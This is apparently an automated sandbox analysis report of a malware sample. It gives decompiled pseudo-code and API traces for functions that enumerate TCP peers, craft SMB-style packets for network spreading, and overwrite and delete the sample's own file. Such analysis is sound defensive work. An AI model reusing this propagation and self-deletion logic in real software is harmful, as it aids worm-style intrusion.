                                                                                                                                                                                        				_t41 = 0;
                                                                                                                                                                                        				_t20 = LoadLibraryW(L"iphlpapi.dll");
                                                                                                                                                                                        				_v20 = _t20;
                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                        					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                        						GetLastError();
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_v12 = 0x100000;
                                                                                                                                                                                        						_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x100000); // executed
                                                                                                                                                                                        						_t50 = _t27;
                                                                                                                                                                                        						_v16 = _t50;
                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                        							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
                                                                                                                                                                                        							asm("sbb ebx, ebx");
                                                                                                                                                                                        							_t41 =  ~_t29 + 1;
                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                        								_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        								if( *_t50 > 0) {
                                                                                                                                                                                        									_t7 = _t50 + 0x12; // 0x12
                                                                                                                                                                                        									_t47 = _t7;
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
                                                                                                                                                                                        											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
                                                                                                                                                                                        											_t52 = _t52 + 0x18;
                                                                                                                                                                                        											E007B6B95( &_v84, 0, _a4);
                                                                                                                                                                                        											_t50 = _v16;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                                                                                        										_t47 =  &(_t47[0x14]);
                                                                                                                                                                                        									} while (_v8 <  *_t50);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							RtlFreeHeap(GetProcessHeap(), 0, _t50); // executed
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					FreeLibrary(_v20);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t41;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 007B734A
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 007B7363
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00100000), ref: 007B737E
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B7385
                                                                                                                                                                                        • GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000001,00000000), ref: 007B73A3
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B73DC
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B7405
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 007B740C
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B7856), ref: 007B7414
                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 007B741D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorExtendedLastLoadProcTablewsprintf
                                                                                                                                                                                        • String ID: Oet Uet0Xet$%u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                                                                                                                                                        • API String ID: 2031097080-2088648562
                                                                                                                                                                                        • Opcode ID: af3133828bf09bbbdcca513ae028c173566904f41d81c7f896b4f62c0b64ef4a
                                                                                                                                                                                        • Instruction ID: a434a9b46eb89fb5ad9d7347b1e5583ce9632ede50ea2adc3788610260d32c19
                                                                                                                                                                                        • Opcode Fuzzy Hash: af3133828bf09bbbdcca513ae028c173566904f41d81c7f896b4f62c0b64ef4a
                                                                                                                                                                                        • Instruction Fuzzy Hash: E4217172904296ABCB215FA88C49FEEBBB8FF49302F144665F541E6181E778D900CB64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B9154(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				int _t16;
                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                        				int _t19;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				char _t31;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t16 = FreeLibrary( *0x7c7b98); // executed
                                                                                                                                                                                        				 *0x7c7b8c = _t16;
                                                                                                                                                                                        				if(_t16 == 0) {
                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t31 = CreateFileW;
                                                                                                                                                                                        				 *0x7c7b98 =  *0x7c7bb4; // executed
                                                                                                                                                                                        				_t18 = CreateFileW(0x7c7bc8, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                                                        				_v12 = _t18;
                                                                                                                                                                                        				if(_t18 != 0) {
                                                                                                                                                                                        					_v8 = GetFileSize(_t18, 0);
                                                                                                                                                                                        					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                        					_t22 = CreateFileW(0x7c7bc8, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                        					_v12 = _t22;
                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                        						_t31 = " Oet Uet0Xet";
                                                                                                                                                                                        						_t24 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
                                                                                                                                                                                        						_v16 = _t24;
                                                                                                                                                                                        						if(_t24 != 0) {
                                                                                                                                                                                        							_t30 =  &_v8;
                                                                                                                                                                                        							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v12);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t19 = DeleteFileW(0x7c7bc8); // executed
                                                                                                                                                                                        				 *0x7c7b84 = _t19; // executed
                                                                                                                                                                                        				_t16 = E007B9016(); // executed
                                                                                                                                                                                        				if(_t16 != 0) {
                                                                                                                                                                                        					_t16 = E007B79D7(0x7c7bc8, _t30, _t31, _a4, _a8, _a12, _a16); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				ExitProcess(0);
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • FreeLibrary.KERNELBASE ref: 007B9161
                                                                                                                                                                                        • CreateFileW.KERNELBASE(007C7BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007B9198
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 007B91A3
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 007B91AF
                                                                                                                                                                                        • CreateFileW.KERNELBASE(007C7BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 007B91C1
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B91D5
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B91D8
                                                                                                                                                                                        • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 007B91F1
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B91FB
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B91FE
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B9207
                                                                                                                                                                                        • DeleteFileW.KERNELBASE(007C7BC8), ref: 007B920E
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B9234
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                                                                                                                                                                        • String ID: Uet0Xet
                                                                                                                                                                                        • API String ID: 1556359713-1689521831
                                                                                                                                                                                        • Opcode ID: e3a3c502abbe36832c9c4fcd36e165bdc951aa1cca1a3480126c481ba4482817
                                                                                                                                                                                        • Instruction ID: 59f71a14ed0629940b289262bf4a6556acc2e8a8b7cfe24f272513eb8125a2d2
                                                                                                                                                                                        • Opcode Fuzzy Hash: e3a3c502abbe36832c9c4fcd36e165bdc951aa1cca1a3480126c481ba4482817
                                                                                                                                                                                        • Instruction Fuzzy Hash: 302119B1801218BBCB216FA1AC4CECEBF79FF49310F108555FA15A2160EA388A51DFA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E007B1EB9(intOrPtr _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				signed short _v20;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                        				signed short _t56;
                                                                                                                                                                                        				long _t58;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                        				intOrPtr* _t74;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				intOrPtr* _t78;
                                                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                                        				char _t93;
                                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                                        				short _t95;
                                                                                                                                                                                        				intOrPtr _t96;
                                                                                                                                                                                        				char _t97;
                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                                        				intOrPtr* _t103;
                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                        				intOrPtr* _t118;
                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                        				intOrPtr* _t121;
                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, 0xffff); // executed
                                                                                                                                                                                        				_v16 = _t49;
                                                                                                                                                                                        				if(_t49 == 0) {
                                                                                                                                                                                        					L24:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t51 = _a12;
                                                                                                                                                                                        				_t101 = _t51 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t89 =  *_t51;
                                                                                                                                                                                        					_t51 = _t51 + 1;
                                                                                                                                                                                        				} while (_t89 != 0);
                                                                                                                                                                                        				_t90 = _t51 - _t101;
                                                                                                                                                                                        				_t53 = _a16;
                                                                                                                                                                                        				_t106 = _t53 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t102 =  *_t53;
                                                                                                                                                                                        					_t53 = _t53 + 1;
                                                                                                                                                                                        				} while (_t102 != 0);
                                                                                                                                                                                        				_t56 = _t90 + _t53 - _t106 + 0x0000000b & 0x0000ffff;
                                                                                                                                                                                        				_v20 = _t56;
                                                                                                                                                                                        				_t58 = (_t56 & 0x0000ffff) + 0x2f;
                                                                                                                                                                                        				_v12 = _t58;
                                                                                                                                                                                        				_t88 = HeapAlloc(GetProcessHeap(), 8, _t58);
                                                                                                                                                                                        				if(_t88 == 0) {
                                                                                                                                                                                        					L23:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                                                        					goto L24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t91 = 9;
                                                                                                                                                                                        				_t66 = memcpy(_t88,  *_a8, _t91 << 2);
                                                                                                                                                                                        				__imp__#9(_v12 + 0xfffffffc);
                                                                                                                                                                                        				_t103 = _a12;
                                                                                                                                                                                        				 *(_t88 + 2) = _t66;
                                                                                                                                                                                        				 *((short*)(_t88 + 0x2b)) = 1;
                                                                                                                                                                                        				 *((short*)(_t88 + 0x2d)) = _v20;
                                                                                                                                                                                        				 *((char*)(_t88 + 8)) = 0x75;
                                                                                                                                                                                        				 *((short*)(_t88 + 0x24)) = 0xff04;
                                                                                                                                                                                        				asm("movsw");
                                                                                                                                                                                        				_t22 = _t88 + 0x32; // 0x32
                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                        				_t118 = _t103;
                                                                                                                                                                                        				_t71 = _t22 - _t103;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t93 =  *_t118;
                                                                                                                                                                                        					 *((char*)(_t71 + _t118)) = _t93;
                                                                                                                                                                                        					_t118 = _t118 + 1;
                                                                                                                                                                                        				} while (_t93 != 0);
                                                                                                                                                                                        				_t72 = _t103;
                                                                                                                                                                                        				_t119 = _t72 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t94 =  *_t72;
                                                                                                                                                                                        					_t72 = _t72 + 1;
                                                                                                                                                                                        				} while (_t94 != 0);
                                                                                                                                                                                        				_t95 = 0x5c;
                                                                                                                                                                                        				 *((short*)(_t72 - _t119 + _t88 + 0x32)) = _t95;
                                                                                                                                                                                        				_t74 = _t103;
                                                                                                                                                                                        				_t120 = _t74 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t96 =  *_t74;
                                                                                                                                                                                        					_t74 = _t74 + 1;
                                                                                                                                                                                        				} while (_t96 != 0);
                                                                                                                                                                                        				_t121 = _a16;
                                                                                                                                                                                        				_t77 = _t74 - _t120 + _t88 + 0x33 - _t121;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t97 =  *_t121;
                                                                                                                                                                                        					 *((char*)(_t77 + _t121)) = _t97;
                                                                                                                                                                                        					_t121 = _t121 + 1;
                                                                                                                                                                                        				} while (_t97 != 0);
                                                                                                                                                                                        				_t78 = _t103;
                                                                                                                                                                                        				_t104 = _t78 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t98 =  *_t78;
                                                                                                                                                                                        					_t78 = _t78 + 1;
                                                                                                                                                                                        				} while (_t98 != 0);
                                                                                                                                                                                        				_t122 = _t78 - _t104;
                                                                                                                                                                                        				_t80 = _a16;
                                                                                                                                                                                        				_t112 = _t80 + 1;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t99 =  *_t80;
                                                                                                                                                                                        					_t80 = _t80 + 1;
                                                                                                                                                                                        				} while (_t99 != 0);
                                                                                                                                                                                        				_t82 = _t80 - _t112 + _t122;
                                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                                        				asm("movsw");
                                                                                                                                                                                        				__imp__#19(_a4, _t88, _v12, 0); // executed
                                                                                                                                                                                        				if(_t82 > 0) {
                                                                                                                                                                                        					_t124 = _v16;
                                                                                                                                                                                        					__imp__#16(_a4, _t124, 0xffff, 0); // executed
                                                                                                                                                                                        					if(_t82 > 0 &&  *((intOrPtr*)(_t124 + 9)) == 0) {
                                                                                                                                                                                        						 *((short*)( *_a8 + 0x1c)) =  *((intOrPtr*)(_t124 + 0x1c));
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t88);
                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                        			}












































                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B1ED2
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,007B943A), ref: 007B1EDB
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,007B943A), ref: 007B1F1F
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B1F22
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007B1F41
                                                                                                                                                                                        • send.WS2_32(?,00000000,?,00000000), ref: 007B1FF1
                                                                                                                                                                                        • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B2008
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A), ref: 007B202B
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2032
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,007B943A), ref: 007B203D
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2044
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$AllocAllocatehtonsrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet$?????
                                                                                                                                                                                        • API String ID: 3465978623-3199473228
                                                                                                                                                                                        • Opcode ID: 7dd51866f717edeb3300798925c0ab2ab981f9d79007164d6271eda69954be21
                                                                                                                                                                                        • Instruction ID: fd90d9d60fbb0994e47932986b436119e0c1c1882dec85810089038403a693a0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dd51866f717edeb3300798925c0ab2ab981f9d79007164d6271eda69954be21
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A5105359042469FCB218F68C858FEA7BF5EF49344B4981A5FC84EB362DB39D809C790
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 39%
                                                                                                                                                                                        			E007B1DD1(void* __ecx, intOrPtr _a4, void** _a8) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t20 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v12 = _t20;
                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                        					_t35 = HeapAlloc(GetProcessHeap(), 8, 0x2b);
                                                                                                                                                                                        					if(_t35 != 0) {
                                                                                                                                                                                        						_t38 = 9;
                                                                                                                                                                                        						_t27 = memcpy(_t35,  *_a8, _t38 << 2);
                                                                                                                                                                                        						__imp__#9(0x27);
                                                                                                                                                                                        						 *(_t35 + 2) = _t27;
                                                                                                                                                                                        						 *((char*)(_t35 + 8)) = 0x74;
                                                                                                                                                                                        						 *((short*)(_t35 + 0x24)) = 0xff02;
                                                                                                                                                                                        						 *((char*)(_t35 + 0x26)) = 0x42;
                                                                                                                                                                                        						 *((short*)(_t35 + 0x27)) = 0x4559;
                                                                                                                                                                                        						__imp__#19(_a4, _t35, 0x2b, 0); // executed
                                                                                                                                                                                        						if(0x4559 > 0) {
                                                                                                                                                                                        							_t47 = _v12;
                                                                                                                                                                                        							__imp__#16(_a4, _t47, 0xffff, 0); // executed
                                                                                                                                                                                        							if(0x4559 > 0 &&  *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                                                                                                        								 *((short*)( *_a8 + 0x20)) = 0;
                                                                                                                                                                                        								memset(_t47, 0, 0xffff);
                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1DE9
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1DF2
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E04
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E07
                                                                                                                                                                                        • htons.WS2_32(00000027), ref: 007B1E21
                                                                                                                                                                                        • send.WS2_32(?,00000000,0000002B,00000000), ref: 007B1E4A
                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B1E63
                                                                                                                                                                                        • memset.MSVCRT ref: 007B1E81
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E90
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1E97
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1EA2
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B54D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 007B1EA9
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 255267840-3175316637
                                                                                                                                                                                        • Opcode ID: fee065a7e70844f501cb59c8fe4d5bae0ed4dbbf5af07debab110a98be8ad39c
                                                                                                                                                                                        • Instruction ID: a38d941c1b5d63e1f7565c1eee127c7f6f7e7fc5334eb612cabb0ba38fb517a4
                                                                                                                                                                                        • Opcode Fuzzy Hash: fee065a7e70844f501cb59c8fe4d5bae0ed4dbbf5af07debab110a98be8ad39c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B21B471600245BBEB205FA4CC4DF9A7BA8FF49300F048165F904DB291D7B8DC04C765
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 54%
                                                                                                                                                                                        			E007B8A6F(void* __ecx, void* _a4) {
                                                                                                                                                                                        				void* _v0;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				void _v24;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t11;
                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                        				_t30 = GetSystemMetrics;
                                                                                                                                                                                        				_t11 = GetSystemMetrics(0x2000); // executed
                                                                                                                                                                                        				_t23 = Sleep;
                                                                                                                                                                                        				while(_t11 == 0) {
                                                                                                                                                                                        					Sleep(0x1f4); // executed
                                                                                                                                                                                        					_t11 = GetSystemMetrics(0x2000);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(SetEvent(_a4) != 0) {
                                                                                                                                                                                        					Sleep(0x3e8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E007B8A23();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				_push(_t27);
                                                                                                                                                                                        				_push(_t27);
                                                                                                                                                                                        				_push(_t23);
                                                                                                                                                                                        				_push(_t30);
                                                                                                                                                                                        				_t31 = _v12;
                                                                                                                                                                                        				_t24 =  *_t31;
                                                                                                                                                                                        				_t13 =  *((intOrPtr*)(_t31 + 4));
                                                                                                                                                                                        				_push(0x2000);
                                                                                                                                                                                        				_v24 = _t24;
                                                                                                                                                                                        				_v28 = _t13;
                                                                                                                                                                                        				if(_t24 < _t13) {
                                                                                                                                                                                        					_t29 = __imp__#14;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t17 = E007BA567( *_t29(_t24)); // executed
                                                                                                                                                                                        						if(_t17 != 0) {
                                                                                                                                                                                        							__imp__#12( *_t29(_t24));
                                                                                                                                                                                        							_t26 = E007B641A(_t18);
                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                        								E007B6B95(_t19, 0,  *((intOrPtr*)(_t31 + 8)));
                                                                                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t26);
                                                                                                                                                                                        								_t31 = _v0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t24 = _v12 + 1;
                                                                                                                                                                                        						_v12 = _t24;
                                                                                                                                                                                        					} while (_t24 < _v16);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				LocalFree(_t31);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}




















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 007B8A81
                                                                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 007B8A90
                                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 007B8A93
                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 007B8A9C
                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 007B8AAB
                                                                                                                                                                                        • htonl.WS2_32(74656490), ref: 007B8AD4
